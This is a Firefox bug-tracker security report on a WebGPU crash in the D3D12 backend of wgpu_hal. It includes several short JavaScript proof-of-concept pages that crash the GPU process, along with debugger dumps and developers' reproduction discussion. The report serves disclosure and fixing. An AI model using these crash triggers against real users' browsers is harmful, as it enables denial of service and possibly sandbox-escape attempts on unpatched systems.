WebGPU - Invalid function pointer in `wgpu_hal` in GPU Process using D3D on Windows
Categories
(Core :: Graphics: WebGPU, defect, P1)
Tracking
()
People
(Reporter: loobenyang, Assigned: ErichDonGubler)
References
Details
(Keywords: csectype-sandbox-escape, reporter-external, sec-high, Whiteboard: [fixed in wgpu#3936][reporter-external] [client-bounty-form] [verif?])
Attachments
(13 files)
162 bytes,
text/html
|
Details | |
191.74 KB,
application/pdf
|
Details | |
201 bytes,
text/html
|
Details | |
122 bytes,
text/html
|
Details | |
7.86 KB,
application/x-zip-compressed
|
Details | |
8.08 KB,
application/x-zip-compressed
|
Details | |
3.82 MB,
application/x-zip-compressed
|
Details | |
2.02 MB,
application/x-zip-compressed
|
Details | |
7.64 MB,
application/x-zip-compressed
|
Details | |
3.81 MB,
application/x-zip-compressed
|
Details | |
2.02 MB,
application/x-zip-compressed
|
Details | |
6.95 KB,
text/plain
|
Details | |
44.61 KB,
text/plain
|
Details |
VULNERABILITY DETAILS
Specifically crafted HTML file can trigger Invalid function pointer read in wgpu_hal in D3D backend. This bug has the potential to be exploited to execute arbitrary code in the GPU process.
Open the PoC (InvalidFunPointer_wgpu_hal_PoC.html) in Firefox.
The PoC can cause faulty interactions between Gecko and D3D libraries, and ultimately lead to Invalid function pointer read in xul!wgpu_hal::dx12::instance::impl$1::enumerate_adapters::closure.
The crash happens at the following instruction which tries to read from meomry address rax and assign it back to rax.
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
00007ff9`f1257d98 488b00 mov rax,qword ptr [rax] ds:00007ffa`3fe75000=????????????????
The next instruction is a virtual function call:
0:096> u
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
00007ff9`f1257d98 488b00 mov rax,qword ptr [rax]
00007ff9`f1257d9b ff15b73c1400 call qword ptr [D3D12Core!_guard_xfg_dispatch_icall_fptr (00007ff9`f139ba58)]
The RAX registers would store the address to jump to. So the invalid memory access happens when it tries to read a function pointer from an invalid memory location.
From this point of view, this bug has the potential of being exploited to execute arbitrary code in the GPU process.
VERSION
Firefox 116.0a1 (2023-06-24) (64-bit)
OS Windows 11 Home 22H2 (Build 22621.1848)
REPRODUCTION CASE (InvalidFunPointer_wgpu_hal_PoC.html. if it does not repro after running it for 10 seconds or so, try opening it in a new tab.)
<script>
navigator.gpu.requestAdapter().then((adapter)=>{adapter.requestDevice().then((val)=>{ setTimeout(function(){location.reload();},200); });});
</script>
Type of crash: gpu process
Crash State:
(1144.38ec): Access violation - code c0000005 (!!! second chance !!!)
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
00007ff9`f1257d98 488b00 mov rax,qword ptr [rax] ds:00007ffa`3fe75000=????????????????
0:096> r
rax=00007ffa3fe75000 rbx=000000000000f914 rcx=0000020fcdac62b0
rdx=000000209180cf30 rsi=0000020fcdac6880 rdi=0000000000000000
rip=00007ff9f1257d98 rsp=000000209180cb60 rbp=000000209180ce10
r8=000000209180d0d0 r9=0000000000000018 r10=dee01e7974d59970
r11=8882222222220020 r12=0000000000000001 r13=00007ffa4f8b5108
r14=000000209180d0d0 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010204
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
00007ff9`f1257d98 488b00 mov rax,qword ptr [rax] ds:00007ffa`3fe75000=????????????????
0:096> dv
Unable to enumerate locals, Win32 error 0n87
Private symbols (symbols.pri) are required for locals.
Type ".hh dbgerr005" for details.
0:096> k
# Child-SP RetAddr Call Site
00 00000020`9180cb60 00007ff9`f1260d80 D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18
01 00000020`9180cb90 00007ff9`f12623d6 D3D12Core!D3D12CoreCreateDevice+0x30c
02 00000020`9180cdb0 00007ffa`4f8a6a4d D3D12Core!D3D12ValidateAndCreateDevice+0x146
03 00000020`9180ce30 00007ffa`4f8a668e d3d12!D3D12CreateDeviceImpl+0x5d
04 00000020`9180ce80 00007ff9`e86d3ee9 d3d12!D3D12CreateDevice+0xae
05 (Inline Function) --------`-------- xul!wgpu_hal::dx12::instance::impl$1::enumerate_adapters::closure$0+0x218 [/builds/worker/checkouts/gecko/third_party/rust/wgpu-hal/src/dx12/instance.rs @ 113]
06 (Inline Function) --------`-------- xul!core::ops::function::impls::impl$3::call_mut+0x218 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\ops\function.rs @ 298]
07 (Inline Function) --------`-------- xul!core::iter::traits::iterator::Iterator::find_map::check::closure$0+0x218 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\iter\traits\iterator.rs @ 2795]
08 (Inline Function) --------`-------- xul!core::iter::traits::iterator::Iterator::try_fold+0x250 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\iter\traits\iterator.rs @ 2299]
09 (Inline Function) --------`-------- xul!core::iter::traits::iterator::Iterator::find_map+0x250 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\iter\traits\iterator.rs @ 2801]
0a 00000020`9180cf00 00007ff9`e87087c0 xul!core::iter::adapters::filter_map::impl$2::next<wgpu_hal::ExposedAdapter<wgpu_hal::dx12::Api>,alloc::vec::into_iter::IntoIter<enum2$<d3d12::dxgi::DxgiAdapter>,alloc::alloc::Global>,wgpu_hal::dx12::instance::impl$1::enumerate_adapters::closure_env$0>+0x279 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\iter\adapters\filter_map.rs @ 61]
0b (Inline Function) --------`-------- xul!alloc::vec::spec_from_iter_nested::impl$0::from_iter+0x8 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\alloc\src\vec\spec_from_iter_nested.rs @ 26]
0c (Inline Function) --------`-------- xul!alloc::vec::in_place_collect::impl$1::from_iter+0x1f [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\alloc\src\vec\in_place_collect.rs @ 167]
0d (Inline Function) --------`-------- xul!alloc::vec::impl$15::from_iter+0x1f [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\alloc\src\vec\mod.rs @ 2724]
0e (Inline Function) --------`-------- xul!core::iter::traits::iterator::Iterator::collect+0x1f [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\iter\traits\iterator.rs @ 1891]
0f 00000020`9180d290 00007ff9`e8094ec3 xul!wgpu_hal::dx12::instance::impl$1::enumerate_adapters+0x70 [/builds/worker/checkouts/gecko/third_party/rust/wgpu-hal/src/dx12/instance.rs @ 115]
10 00000020`9180d510 00007ff9`e667c064 xul!wgpu_bindings::server::wgpu_server_instance_request_adapter+0x383 [/builds/worker/checkouts/gecko/gfx/wgpu_bindings/src/server.rs @ 158]
11 00000020`9180ecc0 00007ff9`e6686d8a xul!mozilla::webgpu::WebGPUParent::RecvInstanceRequestAdapter+0xb4 [/builds/worker/checkouts/gecko/dom/webgpu/ipc/WebGPUParent.cpp @ 295]
12 00000020`9180efb0 00007ff9`e5bece92 xul!mozilla::webgpu::PWebGPUParent::OnMessageReceived+0x394a [/builds/worker/workspace/obj-build/ipc/ipdl/PWebGPUParent.cpp @ 662]
13 00000020`9180f170 00007ff9`e4d9a200 xul!mozilla::gfx::PCanvasManagerParent::OnMessageReceived+0x172 [/builds/worker/workspace/obj-build/ipc/ipdl/PCanvasManagerParent.cpp @ 214]
14 (Inline Function) --------`-------- xul!mozilla::ipc::MessageChannel::DispatchAsyncMessage+0x71 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1811]
15 (Inline Function) --------`-------- xul!mozilla::ipc::MessageChannel::DispatchMessage+0x33c [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1736]
16 00000020`9180f220 00007ff9`e4b68b35 xul!mozilla::ipc::MessageChannel::RunMessage+0x440 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1536]
17 00000020`9180f590 00007ff9`e4ae5186 xul!mozilla::ipc::MessageChannel::MessageTask::Run+0x95 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1643]
18 00000020`9180f5e0 00007ff9`e4ae3d31 xul!nsThread::ProcessNextEvent+0x1096 [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 1194]
19 (Inline Function) --------`-------- xul!NS_ProcessNextEvent+0x29 [/builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp @ 479]
1a 00000020`9180f980 00007ff9`e3c1e27f xul!mozilla::ipc::MessagePumpForNonMainThreads::Run+0x111 [/builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp @ 300]
1b (Inline Function) --------`-------- xul!MessageLoop::RunInternal+0x16 [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 370]
1c 00000020`9180fa30 00007ff9`e325f6fe xul!MessageLoop::RunHandler+0x2f [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 364]
1d 00000020`9180fa80 00007ff9`e3a67562 xul!MessageLoop::Run+0x4e [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 346]
1e 00000020`9180fae0 00007ffa`3c4e739d xul!nsThread::ThreadFunc+0xe2 [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 393]
1f 00000020`9180fcb0 00007ffa`3c569b31 nss3!_PR_NativeRunThread+0x13d [/builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c @ 421]
20 00000020`9180fd20 00007ffa`6b599363 nss3!pr_root+0x11 [/builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c @ 140]
21 00000020`9180fd50 00007ffa`6b6a26ad ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x93
22 00000020`9180fd80 00007ffa`3c7b3bf8 KERNEL32!BaseThreadInitThunk+0x1d
23 (Inline Function) --------`-------- mozglue!mozilla::interceptor::FuncHook<mozilla::interceptor::WindowsDllInterceptor<mozilla::interceptor::VMSharingPolicyShared>,void (*)(int, void *, void *)>::operator()+0x15 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/nsWindowsDllInterceptor.h @ 150]
24 00000020`9180fdb0 00007ffa`6d90a9f8 mozglue!patched_BaseThreadInitThunk+0x28 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/WindowsDllBlocklist.cpp @ 617]
25 00000020`9180fe20 00000000`00000000 ntdll!RtlUserThreadStart+0x28
CREDIT INFORMATION
Reporter credit: Looben Yang
Updated•2 years ago
|
Updated•2 years ago
|
Updated•2 years ago
|
Assignee | ||
Comment 1•2 years ago
•
|
||
I am unable to reproduce this issue with any of the following Windows versions (using mozregression --launch 2023-06-24
):
- 10.0.22000.2057
- 10.0.22000.2124 with Windows Feature Experience Pack 1000.22001.1000.0
…noting that my current hardware profile is:
- MB: ROG CROSSHAIR VIII HERO (WI-FI)
- Graphics Card: NVIDIA GeForce RTX 2060 SUPER
I see that OP is on the Windows 11 22H2 version track, while I'm on the 21H2 version track. I will try upgrading, and attempt to reproduce the issue again.
Assignee | ||
Comment 2•2 years ago
•
|
||
:loobenyang: I have not yet succeeded in reproducing this issue on Windows 10.0.22621.1848 (Windows OS version now matching the OP, though with the same hardware profile as my previous comment). Could you please give me more information about the hardware profile you're reproducing this on?
Updated•2 years ago
|
Comment 3•2 years ago
|
||
Could you also attach the output from about:support?
Assignee | ||
Comment 4•2 years ago
•
|
||
:loobenyang: In addition to :jimb's request (and my previous one 😅), another piece of information that might be important: what kind of build are you running? I see from the preformatted text block in the OP that you're running in WinDbg; are you using a debug build (as opposed to an optimized build)?
Assignee | ||
Comment 5•2 years ago
•
|
||
For my convenience later: I've been using ./mach mozregression --launch 2023-06-24 --pref dom.webgpu.wgpu-backend:dx12 -a http://…/InvalidFunPointer_wgpu_hal_PoC.html
to test this.
Assignee | ||
Updated•2 years ago
|
Reporter | ||
Comment 6•2 years ago
|
||
(In reply to Erich Gubler [:ErichDonGubler] from comment #4)
:loobenyang: In addition to :jimb's request (and my previous one 😅), another piece of information that might be important: what kind of build are you running? I see from the preformatted text block in the OP that you're running in WinDbg; are you using a debug build (as opposed to an optimized build)?
I was using an official nightly build.
When you can not reproduce it in one run, have you try closing the old tab and opening a new tab with the POC?
Reporter | ||
Comment 7•2 years ago
|
||
I just reproduced it again and collect the about support info in a PDF aboutSupoprt.pdf.
The build I used was official Firefox nightly build which is a release build.
Assignee | ||
Comment 8•2 years ago
|
||
:loobenyang: It's helpful to know that this reproduces in latest Firefox! I'm unfortunately not able to reproduce on the latest Firefox. In all of my reproductions, I have attempted to use the advice you reiterated with using multiple tabs.
I'm going to try another Windows machine I have that appears to have a similar hardware profile to the OP's: an integrated Intel GPU that uses Intel HD Graphics 630, and an NVIDIA GeForce GTX 1050 Ti. I have already gotten an access violation on it, but I do not know if it's the same as OP's. Will report back.
Assignee | ||
Comment 9•2 years ago
•
|
||
From the about:support
dump in comment 7, OP is apparently reproducing on a graphics device with PCI vendor ID 0x8086 (Intel) and device ID (0x9BC4). This appears to be an Intel Comet Lake GT2, which uses Intel HD Graphics 630. 🤞🏻Hopefully, the Intel adapter I mentioned in my previous comment is similar enough that I'll get this same issue.
Based on the WebGL info in that same about:support
dump, it seems that WebGPU's backend is actually foregoing selection of an NVIDIA device in the same hardware profile. This appears to be because we are requesting low-power devices from WGPU when GPURequestAdapterOptions.powerPreference
is omitted; I've filed bug 1841840 to capture it as a separate issue from this one.
Assignee | ||
Comment 10•2 years ago
|
||
:loobenyang: Idea: if you specify a power preference in adapter options, i.e., navigator.gpu.requestAdapter()
becomes navigator.gpu.requestAdapter({ powerPreference: "high-performance" })
in the reproduction steps, does this issue still reproduce for you?
Reporter | ||
Comment 11•2 years ago
|
||
(In reply to Erich Gubler [:ErichDonGubler] from comment #10)
:loobenyang: Idea: if you specify a power preference in adapter options, i.e.,
navigator.gpu.requestAdapter()
becomesnavigator.gpu.requestAdapter({ powerPreference: "high-performance" })
in the reproduction steps, does this issue still reproduce for you?
Yes, I can still reproduce it with this option:
<script>
navigator.gpu.requestAdapter({ powerPreference: "high-performance" }).then((adapter)=>{adapter.requestDevice().then((val)=>{ setTimeout(function(){location.reload();},200); });});
</script>
117.0a1 (2023-07-05) (64-bit)
(3950.3d80): Access violation - code c0000005 (!!! second chance !!!)
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
00007ff81e0c7d98 488b00 mov rax,qword ptr [rax] ds:00007ff8
66ee5000=????????????????
0:061> g
(3950.3d80): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
00007ff81e0c7d98 488b00 mov rax,qword ptr [rax] ds:00007ff8
66ee5000=????????????????
0:061> r
rax=00007ff866ee5000 rbx=000000000000f700 rcx=000001b660306800
rdx=00000081ce63cef0 rsi=000001b660306dd0 rdi=0000000000000000
rip=00007ff81e0c7d98 rsp=00000081ce63cb20 rbp=00000081ce63cdd0
r8=00000081ce63d090 r9=0000000000000018 r10=dee01e7974d59970
r11=8882222222220020 r12=0000000000000001 r13=00007ff867015108
r14=00000081ce63d090 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
00007ff81e0c7d98 488b00 mov rax,qword ptr [rax] ds:00007ff8
66ee5000=????????????????
0:061> dv
Unable to enumerate locals, Win32 error 0n87
Private symbols (symbols.pri) are required for locals.
Type ".hh dbgerr005" for details.
0:061> k
Child-SP RetAddr Call Site
00 00000081ce63cb20 00007ff8
1e0d0d80 D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18
01 00000081ce63cb50 00007ff8
1e0d23d6 D3D12Core!D3D12CoreCreateDevice+0x30c
02 00000081ce63cd70 00007ff8
67006a4d D3D12Core!D3D12ValidateAndCreateDevice+0x146
03 00000081ce63cdf0 00007ff8
6700668e d3d12!D3D12CreateDeviceImpl+0x5d
04 00000081ce63ce40 00007ff8
060282e9 d3d12!D3D12CreateDevice+0xae
05 00000081ce63cec0 00007ff8
0605cbc0 xul!JOG_RegisterPing+0xa140f9
06 00000081ce63d250 00007ff8
059e6283 xul!JOG_RegisterPing+0xa489d0
07 00000081ce63d4d0 00007ff8
03fc6b64 xul!JOG_RegisterPing+0x3d2093
08 00000081ce63ec80 00007ff8
03fd188a xul!VR_RuntimePath+0xa6ede4
09 00000081ce63ef70 00007ff8
0352eaa2 xul!VR_RuntimePath+0xa79b0a
0a 00000081ce63f130 00007ff8
026c2d00 xul!mozilla_dump_image+0xebc2
0b 00000081ce63f1e0 00007ff8
024956f5 xul!GIFFT_TimingDistributionCancel+0x847690
0c 00000081ce63f550 00007ff8
0240de76 xul!GIFFT_TimingDistributionCancel+0x61a085
0d 00000081ce63f5a0 00007ff8
0240ca21 xul!GIFFT_TimingDistributionCancel+0x592806
0e 00000081ce63f940 00007ff8
0153f49f xul!GIFFT_TimingDistributionCancel+0x5913b1
0f 00000081ce63f9f0 00007ff8
00b7f73e xul!XRE_GetBootstrap+0x9dd20f
10 00000081ce63fa40 00007ff8
01385622 xul!XRE_GetBootstrap+0x1d4ae
11 00000081ce63faa0 00007ff8
3ed374ed xul!XRE_GetBootstrap+0x823392
12 00000081ce63fc70 00007ff8
3edb9b71 nss3!sqlite3_create_function+0x57d
13 00000081ce63fce0 00007ff8
89c19363 nss3!PR_MD_INIT_LOCKS+0x71
14 00000081ce63fd10 00007ff8
8ad926ad ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x93
15 00000081ce63fd40 00007ff8
5a38deb8 KERNEL32!BaseThreadInitThunk+0x1d
16 00000081ce63fd70 00007ff8
8c12a9f8 mozglue!blink::Decimal::toString+0x888
17 00000081ce63fde0 00000000
00000000 ntdll!RtlUserThreadStart+0x28
Reporter | ||
Comment 12•2 years ago
|
||
Assignee | ||
Comment 13•2 years ago
|
||
FTR: This issue seems very similar to a (closed, but unresolved) report by an old coworker of mine against WGPU upstream (wgpu
#3485).
Assignee | ||
Comment 14•2 years ago
|
||
☝🏻In the bug report mentioned by my previous comment, only enumerating adapters multiple times caused a similar issue in some environments. :loobenyang, are you able to reproduce this issue if you only request adapters, but not devices? Concretely, the JS snippet would be:
navigator.gpu.requestAdapter().then((_adapter)=>{ setTimeout(function(){location.reload();},200); })
Reporter | ||
Comment 15•2 years ago
|
||
(In reply to Erich Gubler [:ErichDonGubler] from comment #14)
☝🏻In the bug report mentioned by my previous comment, only enumerating adapters multiple times caused a similar issue in some environments. :loobenyang, are you able to reproduce this issue if you only request adapters, but not devices? Concretely, the JS snippet would be:
navigator.gpu.requestAdapter().then((_adapter)=>{ setTimeout(function(){location.reload();},200); })
I just tried. And yes I reproduced it after removing the requestDevice() call:
<script>
navigator.gpu.requestAdapter().then((adapter)=>{ setTimeout(function(){location.reload();},200); ;});
</script>
117.0a1 (2023-07-06) (64-bit)
(33ac.2920): Access violation - code c0000005 (!!! second chance !!!)
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
00007ff960b27d98 488b00 mov rax,qword ptr [rax] ds:00007ff9
78cd5000=????????????????
0:096> r
rax=00007ff978cd5000 rbx=000000000000f91e rcx=00000206923c9fd0
rdx=000000ca0a76cce0 rsi=00000206923ca5a0 rdi=0000000000000000
rip=00007ff960b27d98 rsp=000000ca0a76c910 rbp=000000ca0a76cbc0
r8=000000ca0a76ce80 r9=0000000000000018 r10=dee01e7974d59970
r11=8882222222220020 r12=0000000000000001 r13=00007ff9944b5108
r14=000000ca0a76ce80 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010200
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
00007ff960b27d98 488b00 mov rax,qword ptr [rax] ds:00007ff9
78cd5000=????????????????
0:096> dv
Unable to enumerate locals, Win32 error 0n87
Private symbols (symbols.pri) are required for locals.
Type ".hh dbgerr005" for details.
0:096> k
Child-SP RetAddr Call Site
00 000000ca0a76c910 00007ff9
60b30d80 D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18
01 000000ca0a76c940 00007ff9
60b323d6 D3D12Core!D3D12CoreCreateDevice+0x30c
02 000000ca0a76cb60 00007ff9
944a6a4d D3D12Core!D3D12ValidateAndCreateDevice+0x146
03 000000ca0a76cbe0 00007ff9
944a668e d3d12!D3D12CreateDeviceImpl+0x5d
04 000000ca0a76cc30 00007ff9
1f50aa19 d3d12!D3D12CreateDevice+0xae
05 000000ca0a76ccb0 00007ff9
1f53f2f0 xul!JOG_RegisterPing+0xa12279
06 000000ca0a76d040 00007ff9
1eec9ff3 xul!JOG_RegisterPing+0xa46b50
07 000000ca0a76d2c0 00007ff9
1d4ac864 xul!JOG_RegisterPing+0x3d1853
08 000000ca0a76ea70 00007ff9
1d4b758a xul!VR_RuntimePath+0xa6efe4
09 000000ca0a76ed60 00007ff9
1ca145a2 xul!VR_RuntimePath+0xa79d0a
0a 000000ca0a76ef20 00007ff9
1bbba410 xul!mozilla_dump_image+0xebc2
0b 000000ca0a76efd0 00007ff9
1b98f025 xul!GIFFT_TimingDistributionCancel+0x857ef0
0c 000000ca0a76f340 00007ff9
1b90b1bf xul!GIFFT_TimingDistributionCancel+0x62cb05
0d 000000ca0a76f390 00007ff9
1b909e21 xul!GIFFT_TimingDistributionCancel+0x5a8c9f
0e 000000ca0a76f730 00007ff9
1aa0b74f xul!GIFFT_TimingDistributionCancel+0x5a7901
0f 000000ca0a76f7e0 00007ff9
1a03f81e xul!XRE_GetBootstrap+0x9e94bf
10 000000ca0a76f830 00007ff9
1a84d652 xul!XRE_GetBootstrap+0x1d58e
11 000000ca0a76f890 00007ff9
678273ad xul!XRE_GetBootstrap+0x82b3c2
12 000000ca0a76fa60 00007ff9
678a9df1 nss3!sqlite3_create_function+0x57d
13 000000ca0a76fad0 00007ff9
a8409363 nss3!PR_MD_INIT_LOCKS+0x71
14 000000ca0a76fb00 00007ff9
a8c426ad ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x93
15 000000ca0a76fb30 00007ff9
74d333a8 KERNEL32!BaseThreadInitThunk+0x1d
16 000000ca0a76fb60 00007ff9
aae4a9f8 mozglue!blink::Decimal::toString+0x888
17 000000ca0a76fbd0 00000000
00000000 ntdll!RtlUserThreadStart+0x28
Reporter | ||
Comment 16•2 years ago
|
||
Assignee | ||
Comment 17•2 years ago
•
|
||
:loobenyang: Great, thank you! That's very informative. My suspicion that this has the same root cause as wgpu
#3485 has increased greatly. I think the most effective next step here will be to run the reproducible example there (in Rust) to see if we get a similar crash. If we do get one, then we can eliminate the vast majority of the Firefox layers that are suspect in this investigation. CC :jgilbert, :jimb, :teoxoy.
To test my hypothesis, we will need to run a binary on your machine. I've attached a ZIP file containing Rust source code (wgpu-3485-mvre.zip
) with which you can compile such a binary. This has had its Cargo.toml
updated to use the latest wgpu
, which is 0.16.1
at time of writing. You may use Rust's cargo
tool (which I find most convenient to install with rustup
) to invoke cargo build
, which should produce the same artifact, i.e., using cargo build
and/or cargo run
.
For convenience, you might first try using the compiled artifacts already uploaded in wgpu
#3485's OP:
…but if you do get a similar crash with the binaries uploaded to the wgpu
issue, it would be best to also attempt to reproduce the crash with the latest wgpu
from the source I've provided.
Reporter | ||
Comment 18•2 years ago
|
||
I ran the binary wgpu-test.exe many times but did not see anything abnormal. Result of the binary:
Test A:
AdapterInfo {
name: "NVIDIA GeForce RTX 2060",
vendor: 0x10DE,
device: 0x1F15,
device_type: DiscreteGpu,
driver: "NVIDIA",
driver_info: "517.00",
backend: Vulkan,
}
AdapterInfo {
name: "Intel(R) UHD Graphics",
vendor: 0x8086,
device: 0x9BC4,
device_type: IntegratedGpu,
driver: "Intel Corporation",
driver_info: "Intel driver",
backend: Vulkan,
}
AdapterInfo {
name: "NVIDIA GeForce RTX 2060",
vendor: 0x10DE,
device: 0x1F15,
device_type: DiscreteGpu,
driver: "",
driver_info: "",
backend: Dx12,
}
AdapterInfo {
name: "Intel(R) UHD Graphics",
vendor: 0x8086,
device: 0x9BC4,
device_type: IntegratedGpu,
driver: "",
driver_info: "",
backend: Dx12,
}
AdapterInfo {
name: "Microsoft Basic Render Driver",
vendor: 0x1414,
device: 0x8C,
device_type: Cpu,
driver: "",
driver_info: "",
backend: Dx12,
}
Test B:
AdapterInfo {
name: "NVIDIA GeForce RTX 2060",
vendor: 0x10DE,
device: 0x1F15,
device_type: DiscreteGpu,
driver: "",
driver_info: "",
backend: Dx12,
}
AdapterInfo {
name: "Intel(R) UHD Graphics",
vendor: 0x8086,
device: 0x9BC4,
device_type: IntegratedGpu,
driver: "",
driver_info: "",
backend: Dx12,
}
AdapterInfo {
name: "Microsoft Basic Render Driver",
vendor: 0x1414,
device: 0x8C,
device_type: Cpu,
driver: "",
driver_info: "",
backend: Dx12,
}
Assignee | ||
Comment 19•2 years ago
|
||
:loobenyang: Just to make sure I understand, did you not try to compile and run the code I provided? Or are both results (running the old wgpu-test
binary, running the code I provided) negative?
Assignee | ||
Comment 20•2 years ago
|
||
Assignee | ||
Comment 21•2 years ago
|
||
Assignee | ||
Comment 22•2 years ago
|
||
Assignee | ||
Comment 23•2 years ago
|
||
At this point, I think our next best step is to try lots of different things, and see where this bug still reproduces. 😅 I have multiple ideas from brainstorming sessions with coworkers, and they shouldn't be hard to test, but keeping track of individual experiments and questions is probably going to be challenging. I'll post them as separate comments, so they're hopefully easier to address.
Assignee | ||
Comment 24•2 years ago
|
||
- ASAN builds in Firefox might help us detect the same problem by (intentionally) crashing at an earlier point in execution. You can retrieve ASan-enabled 64-bit Windows builds of Firefox Desktop at http://archive.mozilla.org/pub/firefox/nightly/latest-mozilla-central/firefox-117.0a1.en-US.win64-asan-reporter.zip. :loobenyang, could you please try reproducing this in the latest nightly ASan reporter build?
Assignee | ||
Comment 25•2 years ago
|
||
- This bug might be related to a data race or thread safety condition of some kind in either D3D12 init., or how WGPU is using it. Looping initialization calls inside multiple threads, instead of only enumerating twice before exiting the process as in previous commentary, might reproduce the situation. This would be consistent with your statements that running tests repeatedly has been the most reliable way for you to reproduce these issues locally. I have attached the following (comments 20-22) to assist with trying this:
wgpu-3485-mvre-v2-loops-and-threads.zip
: New source code based on comment 17's MVRE package. It is the code from which the other attachments are compiled, with the Rust 1.70.0 toolchain.wgpu-3485-mvre-v2-loops-and-threads-debug.zip
: debug build of the above.wgpu-3485-mvre-v2-loops-and-threads-release.zip
: same, but a release (optimized) build.
:loobenyang, could you please try reproducing this issue with one of the above binaries, or by compiling and running the above Rust source?
Assignee | ||
Comment 26•2 years ago
|
||
- One of the stack frames in the OP is named
D3D12ValidateAndCreateDevice
, which may imply a relationship to D3D12's validation layers. This might be important; validation layers are intended to change behavior for the sake of diagnostics, but they can also change behavior such that behavior that does not crash without them may crash while they are enabled.
To start with this thread of discussion: :loobenyang, do you have any system configuration that alters the set of validation layers enabled for D3D12?
Assignee | ||
Updated•2 years ago
|
Assignee | ||
Comment 28•2 years ago
|
||
Assignee | ||
Comment 29•2 years ago
|
||
In case it helps eventually: I have attached the contents of about:support
's output on my primary Windows workstation as aboutSupport.pdf.zip
.
Reporter | ||
Comment 30•2 years ago
|
||
(In reply to Erich Gubler [:ErichDonGubler] from comment #19)
:loobenyang: Just to make sure I understand, did you not try to compile and run the code I provided? Or are both results (running the old
wgpu-test
binary, running the code I provided) negative?
I did not compile the code. I ran the binary only.
Assignee | ||
Comment 31•2 years ago
|
||
Assignee | ||
Comment 32•2 years ago
|
||
Assignee | ||
Comment 33•2 years ago
|
||
(In reply to Looben Yang from comment #30)
(In reply to Erich Gubler [:ErichDonGubler] from comment #19)
:loobenyang: Just to make sure I understand, did you not try to compile and run the code I provided? Or are both results (running the old
wgpu-test
binary, running the code I provided) negative?I did not compile the code. I ran the binary only.
Just so we can compare apples-to-apples with what Firefox is currently consuming, let's run the code that uses wgpu
0.16.0, like Firefox currently does. I've attached two ZIP archives containing compiled binaries of the source in wgpu-3485-mvre.zip
with different optimization levels (wgpu-3485-mvre-debug.exe.zip
and wgpu-3485-mvre-release.exe.zip
). Could you please run them, and let me know what the result is?
BTW, I appreciate your patience. I know I'm asking you for a lot of bug repro attempts (and unfortunately, I don't see that changing soon). 😅 I wish that I had an environment in which I could reproduce this consistently, and attach a debugger.
Comment hidden (duplicate) |
Reporter | ||
Comment 35•2 years ago
|
||
(In reply to Erich Gubler [:ErichDonGubler] from comment #24)
- ASAN builds in Firefox might help us detect the same problem by (intentionally) crashing at an earlier point in execution. You can retrieve ASan-enabled 64-bit Windows builds of Firefox Desktop at http://archive.mozilla.org/pub/firefox/nightly/latest-mozilla-central/firefox-117.0a1.en-US.win64-asan-reporter.zip. :loobenyang, could you please try reproducing this in the latest nightly ASan reporter build?
I just tried and did reproduce it on Mozilla official ASAN build. But ASAN build does not help much here in this case, probably because it's not a direct corruption against ASAN instrumented objects.
<script>
navigator.gpu.requestAdapter().then((adapter)=>{adapter.requestDevice().then((val)=>{ setTimeout(function(){location.reload();},200); });});
</script>
Firefox: 117.0a1 (2023-07-12) (64-bit)
OS: Windows 11 Enterprise 22H2 22621
(978.c80c): Access violation - code c0000005 (!!! second chance !!!)
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
